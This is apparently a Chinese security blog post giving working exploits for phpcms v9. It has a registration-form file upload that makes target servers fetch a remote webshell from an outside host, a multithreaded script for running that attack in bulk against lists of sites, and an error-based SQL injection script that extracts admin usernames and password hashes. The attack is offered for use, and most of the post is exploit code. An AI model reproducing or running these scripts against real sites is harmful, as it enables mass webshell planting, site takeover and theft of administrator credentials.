phpcms前台getshell(附:注入)

1. phpcms v9 前台文件上传(getshell):通过会员注册接口 m=member&c=index&a=register 提交 info[content] 字段,其中的 <img src=...> 指向攻击者托管的远程文件;服务器抓取该文件并落地后,会在响应中以 src=http://... 的形式回显本地路径,这就是 shell 地址。前提是站点开启了会员注册;下面请求里的 siteid=1、modelid=11 取自测试环境,实际目标需按站点配置调整。

http://192.168.107.138/phpcms/index.php?m=member&c=index&a=register&siteid=1

POST:siteid=1&modelid=11&username=123456&password=123456&[email protected]&info[content]=<img src=http://www.webbaozi.com/phpcmsv9/v9.txt?.php#.jpg>&dosubmit=1&protocol=

批量利用脚本如下(远程文件 v9.txt 为一句话木马,作者称可过安全狗、D盾;脚本为 Python 2,依赖 urllib2,用法见文件头注释:v9.py url.txt vul_url.txt)。注意 payload 托管在第三方域名上,谁控制该域名谁就控制落到目标上的内容,实际使用时应换成自己控制的地址:


#!/usr/bin/env python
#coding:utf-8
#data:20170410

'''
test:http://www.hfssw.com
usage:v9.py url.txt vul_url.txt
'''

import sys,pytz,urllib,urllib2,threading

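# Serialises writes to the shared output handle ``fw`` (opened by the caller
# in ``__main__``) from the worker threads that call getshell().
_write_lock = threading.Lock()

# Characters that end an unquoted attribute value in the echoed <img> tag.
_URL_DELIMS = ' \t\r\n"\'<>'


def extract_upload_url(html):
    """Return the URL the server echoes back for the stored file, or "".

    The registration response contains the submitted <img> tag with its
    ``src`` rewritten to the locally stored copy.  The value is read from
    the first ``src=http`` up to the first whitespace, quote or angle
    bracket.  The original used a fixed ``len(url) + 67`` window, where
    ``url`` was the racy module-level loop variable of ``__main__`` rather
    than this thread's target, so it broke for target lists of mixed
    length; it also sliced from index -1 when the marker was absent.
    """
    start = html.find("src=http")
    if start < 0:
        return ""
    start += len("src=")
    end = start
    while end < len(html) and html[end] not in _URL_DELIMS:
        end += 1
    return html[start:end]


def getshell(target):
    """Register a throw-away member on *target* and record the upload URL.

    target: base URL of a phpcms v9 install (e.g. ``http://host/phpcms``),
        without trailing slash.  Requires member registration to be enabled.
    Side effects: prints the result and, when a URL was found, appends it
    (one per line) to the module-level file handle ``fw``.
    Returns the URL of the stored file, or "" when the request failed or the
    response did not echo a ``src=http`` value.
    """
    vuln_url = target + "/index.php?m=member&c=index&a=register&siteid=1"
    form = {
        "dosubmit": 1,
        "modelid": 11,  # member model id of the test site; adjust per target
        "username": "hello12345",
        "password": "hello12345",
        # NOTE(review): this literal looks like an extraction artefact and is
        # not a syntactically valid address -- use a plausible one.
        "email": "[email protected]",
        # Remote file the target is made to fetch.  Whoever controls that host
        # controls what lands on the target: host your own copy.
        # NOTE(review): the manual request at the top of the page closes the
        # tag with ">"; this literal does not -- confirm which form the
        # target accepts.
        "info[content]": "<img src=http://www.webbaozi.com/phpcmsv9/v9.txt?.php#.jpg",
    }
    try:
        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor())
        # Bounded timeout: a hung host must not pin a worker thread forever.
        response = opener.open(urllib2.Request(vuln_url),
                               urllib.urlencode(form), timeout=15)
        html = response.read()
    except Exception as exc:  # thread boundary: report, keep scanning
        print("[-] %s: %s" % (target, exc))
        html = ""

    upload_url = extract_upload_url(html)
    if upload_url:
        with _write_lock:
            fw.write(upload_url + "\n")
        print(upload_url + "\n")
    else:
        print("[-] %s: no upload URL in response" % target)
    return upload_url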

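if __name__ == "__main__":
    # usage: v9.py url.txt vul_url.txt
    #   url.txt     one target base URL per line (blank lines skipped)
    #   vul_url.txt results are appended, one upload URL per line
    if len(sys.argv) != 3:
        sys.exit("usage: %s url.txt vul_url.txt" % sys.argv[0])

    # The original busy-spun until fewer than 50 threads (incl. main) were
    # alive; a semaphore gives the same bound without burning a core.
    MAX_WORKERS = 49
    slots = threading.BoundedSemaphore(MAX_WORKERS)

    def _worker(target):
        # Always free the slot, even if getshell() raises.
        try:
            getshell(target)
        finally:
            slots.release()

    workers = []
    # ``fw`` is module-global on purpose: getshell() writes through it.
    with open(sys.argv[2], "a") as fw:
        with open(sys.argv[1]) as targets:
            for line in targets:
                target = line.strip()
                if not target:
                    continue
                slots.acquire()  # blocks until a worker finishes
                t = threading.Thread(target=_worker, args=(target,))
                workers.append(t)
                t.start()
        # All pending writes must land before the handle is closed.
        for t in workers:
            t.join()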


2. phpcms v9.6.0 前台 SQL 注入:先请求 attachment 模块的 swfupload_json,注入语句经 src 参数被写入 *_att_json cookie,再把该 cookie 值作为 content/down 的 a_k 参数提交触发注入;结果通过 exp() 报错注入回显在页面中,因此目标需要显示 SQL 错误。

利用脚本如下(Python 2,依赖 requests;参数为目标站点根 URL,依次读出 user()/version(),并根据报错信息推断表前缀后读取 <前缀>_admin 表第一条记录的 username、password、encrypt):


import requests,sys,urllib
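# Error-based injection: exp(~(select ...)) overflows a DOUBLE and MySQL
# repeats the subquery result in the error text, framed by ``luan$``
# (0x6c75616e24) so it can be cut out of the page.
# NOTE(review): the ``*`` inside keywords (``se*lect``) is presumably stripped
# by a server-side filter before the SQL is built, which is why the keywords
# are split -- confirm against the target's input sanitising.
SQLI_PREFIX = '%*27an*d%20'
SQLI_INFO = 'e*xp(~(se*lect%*2af*rom(se*lect co*ncat(0x6c75616e24,us*er(),0x3a,ver*sion(),0x6c75616e24))x))'
SQLI_PASSWORD1 = 'e*xp(~(se*lect%*2afro*m(sel*ect co*ncat(0x6c75616e24,username,0x3a,password,0x3a,encrypt,0x6c75616e24) fr*om '
SQLI_PASSWORD2 = '_admin li*mit 0,1)x))'
SQLI_PADDING = '%23%26m%3D1%26f%3Dwobushou%26modelid%3D2%26catid%3D6'
# quote_plus never encodes letters anyway; the point of ``safe`` is ``*``.
_QUOTE_SAFE = 'qwertyuiopasdfghjklzxcvbnm*'
OUTPUT_MARKER = 'luan$'
TABLE_ANCHOR = '_download_data'


def _quote(fragment):
    """URL-encode a SQL fragment, leaving ``*`` untouched."""
    return urllib.quote_plus(fragment, safe=_QUOTE_SAFE)


def extract_marked_output(html):
    """Return the text after the first ``luan$`` marker (up to the next
    one), or None when the marker is absent -- the original indexed
    ``split(...)[1]`` unconditionally and crashed with IndexError."""
    parts = html.split(OUTPUT_MARKER)
    return parts[1] if len(parts) > 1 else None


def extract_table_prefix(html):
    """Return the two characters preceding ``_download_data`` in *html*
    (``v9`` for the default ``v9_`` prefix), or None if it is absent.

    NOTE(review): assumes a two-character prefix, exactly as the original
    did; a longer custom prefix is truncated and the admin query will miss.
    """
    pos = html.find(TABLE_ANCHOR)
    if pos < 2:
        return None
    return html[pos - 2:pos]


def fetch_site_cookies(url):
    """GET the wap index and mirror the ``<prefix>_siteid`` cookie into
    ``<prefix>_userid`` (same value), as the later requests expect.

    Returns the cookie dict; empty when no ``*_siteid`` cookie was set, in
    which case the original left ``cookie_head`` unbound.
    """
    cookies = {}
    for c in requests.get(url + '/index.php?m=wap&a=index&siteid=1').cookies:
        if c.name[-7:] == '_siteid':
            cookie_head = c.name[:6]
            cookies[cookie_head + '_userid'] = c.value
            cookies[c.name] = c.value
    return cookies


def run_injection(url, cookies, injected):
    """Run one injected query and return the content/down response body.

    swfupload_json wraps its ``src`` parameter into the ``<prefix>_att_json``
    cookie; that cookie value is then handed to content/down as ``a_k``,
    which presumably decodes it server-side before it reaches the query.
    Returns None when the cookie is not issued (previously ``sqli_payload``
    was simply unbound).
    """
    swfupload_url = (url + '/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id='
                     + SQLI_PREFIX + injected + SQLI_PADDING)
    payload = None
    for c in requests.get(swfupload_url, cookies=cookies).cookies:
        if c.name[-9:] == '_att_json':
            payload = c.value
    if payload is None:
        return None
    print('[+] Get SQLi Payload : ' + payload)
    down_url = url + '/index.php?m=content&c=down&a_k=' + payload
    return requests.get(down_url, cookies=cookies).content


def main(url):
    """Dump user()/version() and the first ``<prefix>_admin`` row of *url*."""
    print('Phpcms v9.6.0 SQLi Exploit Code By Luan')
    cookies = fetch_site_cookies(url)
    if not cookies:
        sys.exit('[-] no *_siteid cookie from the wap index; not phpcms v9 or already patched?')
    print('[+] Get Cookie : ' + str(cookies))

    html = run_injection(url, cookies, _quote(SQLI_INFO))
    if html is None:
        sys.exit('[-] no *_att_json cookie returned by swfupload_json')
    output = extract_marked_output(html)
    if output is None:
        sys.exit('[-] output marker missing: injection filtered or SQL errors not displayed')
    print('[+] Get SQLi Output : ' + output)

    # The error text presumably names the table the vulnerable query hit,
    # which leaks the configured prefix needed to address <prefix>_admin.
    table_prefix = extract_table_prefix(html)
    if table_prefix is None:
        sys.exit('[-] _download_data not in response; cannot infer the table prefix')
    print('[+] Get Table Prefix : ' + table_prefix)

    # The prefix is spliced in raw, between the two encoded fragments.
    html = run_injection(url, cookies,
                         _quote(SQLI_PASSWORD1) + table_prefix + _quote(SQLI_PASSWORD2))
    if html is None:
        sys.exit('[-] no *_att_json cookie returned by swfupload_json')
    output = extract_marked_output(html)
    if output is None:
        sys.exit('[-] output marker missing in the credential query response')
    print('[+] Get SQLi Output : ' + output)


if __name__ == '__main__':
    if len(sys.argv) != 2:
        sys.exit('usage: %s http://target' % sys.argv[0])
    main(sys.argv[1])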



本文作者:webbaozi      文章标题: phpcms前台getshell(附:注入)
本文地址:http://www.webbaozi.com/stcs/60.html
版权声明:若无注明,本文皆为“baozi|学与用”原创,转载请保留文章出处。
